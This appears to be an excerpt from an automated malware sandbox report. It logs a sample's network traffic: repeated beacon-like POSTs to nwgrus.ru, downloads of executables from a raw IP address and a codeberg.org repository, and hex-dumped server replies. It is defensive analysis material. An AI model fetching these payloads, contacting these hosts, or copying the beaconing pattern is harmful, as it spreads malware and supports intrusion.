Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynyhgoxksqcqux.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://efqngojwjwmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://slcfgcsbfxfboq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://soxhctcejph.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://unecmrmecypjdcds.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rsqwlptdbkicnj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qfsgibodkcmgjnhs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iypyxugbhpjfu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wckgnkwavbhg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bsjhlaqplgxee.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://msepyhqdoiyw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ubqbmapskssunnlw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qfqulohrbnuwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ishmldllgtoat.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pgccgnhrnlclx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aavvgkbncxkwcma.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ldwiwwwcudjue.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://msydcfqytkyly.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynkhngybxmld.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iwomylugxujp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vqlmgxiqipmlfda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mhabccdcfgoeshi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qhqjabyurfswwyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jfivjaggias.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oecmcnbulbfndgqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tpydbdrotfs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qrkdkbqfwfclqg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://owadrehnugjdh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wyvokdhlnlrsvuh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://daglechfqxgadh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lshvsjxacvhbre.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nweaheqhdcfapi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jwpopyrbbpjc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://syllqtgnchytfjbx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: GET /alexcode11/templates/raw/branch/main/setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: codeberg.org

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: codeberg.org
Source: global traffic	DNS traffic detected: DNS query: calvinandhalls.com
Source: global traffic	DNS traffic detected: DNS query: bestworldhools.com

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymfsjxxjefdfso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 